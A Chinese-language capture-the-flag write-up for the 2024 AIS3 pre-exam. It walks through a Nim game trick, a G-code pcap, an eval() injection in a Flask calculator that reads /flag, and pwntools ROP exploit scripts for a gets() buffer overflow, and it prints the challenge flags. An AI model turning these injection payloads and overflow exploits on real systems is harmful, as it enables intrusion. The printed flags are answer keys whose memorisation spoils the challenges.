2024 AIS3 pre-exam

[Welcome]

flag就放在題目裡，我沒有截下來

[Quantum Nim Heist]

會發現是一個叫你拿石頭的遊戲

1
yih_0118@Macbook Downloads % nc chals1.ais3.org 40004
2
+-------------------- welcome --------------------+
3
| omg hi!                                         |
4
|                                                 |
5
| welcome to microchess, the minimal online chess |
6
| platform.                                       |
7
| i am a super powerful chess AI!                 |
8
| can you win against me and get the flag?        |
9
+---+--------------- main menu -------------------+
10
| 0 | read the rules of the game                  |
11
| 1 | start a new game against me                 |
12
| 2 | load a saved game                           |
13
| 3 | leave                                       |
14
+---+---------------------------------------------+

有一個技巧，當拿到兩個樁各剩一顆，然後跟他套，誒我要拿石頭但是輸入值一直是0

1
+---+-------------- stones info ------------------+
2
| 0 | o                                           |
3
| 1 | o                                           |
4
+---+--------------- game menu -------------------+
5
| 0 | make a move                                 |
6
| 1 | save the current game and leave             |
7
| 2 | resign the game                             |
8
+---+---------------------------------------------+
9
it's your turn to move! what do you choose? 0
10
which pile do you choose? 0
11
how many stones do you remove? 0

然後再試一下，我每次輸入001就過了

1
it's your turn to move! what do you choose? 0
2
which pile do you choose? 0
3
how many stones do you remove? 1
4
+---------------- congratulations ----------------+
5
| you are a true grandmaster of chess! here is    |
6
| the flag for you:                               |
7
| AIS3{Ar3_y0u_a_N1m_ma57er_0r_a_Crypt0_ma57er?}  |
8
+-------------------------------------------------+

[Three Dimensional Secret]

他會給你一個網路封包，丟到wireshark去看看 stream出來後會發現好像是G-code然後可以丟到個網站

網頁連結↗ 就出來了

[Evil Calculator]

發現是一個神奇的計算機假如我按下1+1再按下等於，我用burp suite去攔截會發現是一個json格式的東東去看一下app.js裡面有什麼洞可以鑽

1
@app.route('/calculate', methods=['POST'])
2
def calculate():
3
    data = request.json
4
    expression = data['expression'].replace(" ","").replace("_","")
5
    try:
6
        result = eval(expression)
7
    except Exception as e:
8
        result = str(e)
9
    return jsonify(result=str(result))

發現用eval()可以去鑽，直接出入指令去求出flag 可以使用burp suite的repeater去看回覆那我們把expression改成"open('/flag', 'r').read()" 然後就出來了

[Mathter]

進去goodbye看一下ㄟ竟然有gets，可以overflow 發現是v1[4] 所以要打12進去有兩個神奇函數，繞進去好了? 觀察一下win1 發現-559038737會是0xDEADBEEF 觀察一下win2 發現-889275714會是0xcafebabe

1
from pwn import *
2
r = remote("chals1.ais3.org" ,50001)
3
r.recvuntil(b':')
4
r.sendline(b'q')
5
r.recvlines(2)
6
padding = b'a' * 12
7
elf = ELF('./mathter')
8
rop = ROP(elf)
9
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
10
arg = 0xdeadbeef
11
win1 = elf.symbols['win1']
12
payload = padding
13
payload += p64(pop_rdi)
14
payload += p64(arg)
15
payload += p64(win1)
16
r.sendline(payload)
17
r.interactive()

得出上半部

1
from pwn import *
2
r = remote("chals1.ais3.org", 50001)
3
r.recvuntil(b':')
4
r.sendline(b'q')
5
r.recvlines(2)
6
padding = b'a' * 12
7
elf = ELF('./mathter')
8
rop = ROP(elf)
9
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
10
arg = 0xcafebabe
11
win2 = elf.symbols['win2']
12
payload = padding
13
payload += p64(pop_rdi)
14
payload += p64(arg)
15
payload += p64(win2)
16
r.sendline(payload)
17
r.interactive()